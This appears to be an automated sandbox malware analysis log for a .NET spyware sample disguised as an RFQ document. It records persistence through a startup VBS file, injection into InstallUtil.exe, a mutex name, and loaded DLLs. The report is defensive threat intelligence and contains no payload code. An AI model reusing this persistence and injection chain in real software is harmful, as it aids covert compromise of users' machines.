              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_053395672_2_05339567
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_053395A02_2_053395A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0533B49B2_2_0533B49B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0533B9C72_2_0533B9C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0533B8F82_2_0533B8F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0533B3B22_2_0533B3B2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0533B3A92_2_0533B3A9
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_00F121A05_2_00F121A0
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_00F1216F5_2_00F1216F
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_00F127215_2_00F12721
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05D76D475_2_05D76D47
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05D786CB5_2_05D786CB
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05D749505_2_05D74950
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05D710505_2_05D71050
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05D710605_2_05D71060
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05D7CBF05_2_05D7CBF0
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05E777B85_2_05E777B8
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05E761485_2_05E76148
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05E761385_2_05E76138
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05E700405_2_05E70040
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05E700065_2_05E70006
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05E777A95_2_05E777A9
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05E77A935_2_05E77A93
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F846605_2_05F84660
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F800405_2_05F80040
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F87FD05_2_05F87FD0
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F810F85_2_05F810F8
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F810E95_2_05F810E9
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F800065_2_05F80006
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F85C685_2_05F85C68
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F849875_2_05F84987
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F9CE385_2_05F9CE38
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F9F7605_2_05F9F760
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F9CE285_2_05F9CE28
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05FBA4385_2_05FBA438
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05FB97605_2_05FB9760
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05FB43185_2_05FB4318
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05FB9C645_2_05FB9C64
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05FBA42A5_2_05FBA42A
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05FB97EF5_2_05FB97EF
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05FB97525_2_05FB9752
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05FBC8A85_2_05FBC8A8
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05FBC8985_2_05FBC898
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_062600255_2_06260025
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_062600405_2_06260040
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_0627E1805_2_0627E180
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_029344206_2_02934420
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02932DA86_2_02932DA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02933B856_2_02933B85
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0293481A6_2_0293481A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_029348326_2_02934832
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_029348556_2_02934855
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_029348726_2_02934872
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_029341986_2_02934198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_029341886_2_02934188
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_029347AC6_2_029347AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_029347D66_2_029347D6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_029347C26_2_029347C2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_029347FE6_2_029347FE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02932D986_2_02932D98
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02932DA86_2_02932DA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05295D086_2_05295D08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05297C686_2_05297C68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05290A986_2_05290A98
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0529BD406_2_0529BD40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05290F7F6_2_05290F7F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_053311706_2_05331170
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0533D0F06_2_0533D0F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_053323426_2_05332342
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05365A806_2_05365A80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_053645886_2_05364588
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0536C7486_2_0536C748
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0536A6216_2_0536A621
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_053696906_2_05369690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_053696816_2_05369681
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0536B1376_2_0536B137
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0536B1486_2_0536B148
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0536F1B86_2_0536F1B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0536D0686_2_0536D068
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0536D0586_2_0536D058
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05365A706_2_05365A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_053622486_2_05362248
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05376C186_2_05376C18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05376F786_2_05376F78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0537C5886_2_0537C588
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05376C086_2_05376C08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05376F686_2_05376F68
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1478288799.0000000006110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameJiyvv.dll" vs RFQ-12202430_ACD_Group.pif.exe
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1480750438.0000000006660000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ-12202430_ACD_Group.pif.exe
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ-12202430_ACD_Group.pif.exe
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1464168133.000000000111E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ-12202430_ACD_Group.pif.exe
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1465657155.0000000003587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLfrvzcdfgz.exe" vs RFQ-12202430_ACD_Group.pif.exe
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1478064695.000000000607E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebuildtimes.e vs RFQ-12202430_ACD_Group.pif.exe
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1465657155.0000000003057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs RFQ-12202430_ACD_Group.pif.exe
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000000.1414063959.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebuildtimes.exe6 vs RFQ-12202430_ACD_Group.pif.exe
              Source: RFQ-12202430_ACD_Group.pif.exeBinary or memory string: OriginalFilenamebuildtimes.exe6 vs RFQ-12202430_ACD_Group.pif.exe
              Source: RFQ-12202430_ACD_Group.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/6@2/2
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\fc2a428e6332
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs"
              Source: RFQ-12202430_ACD_Group.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: RFQ-12202430_ACD_Group.pif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RFQ-12202430_ACD_Group.pif.exeReversingLabs: Detection: 60%
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeFile read: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exe "C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exe"
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\AuditFlags.exe "C:\Users\user\AppData\Roaming\AuditFlags.exe"
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\AuditFlags.exe "C:\Users\user\AppData\Roaming\AuditFlags.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: iphlpapi.dllJump to behavior
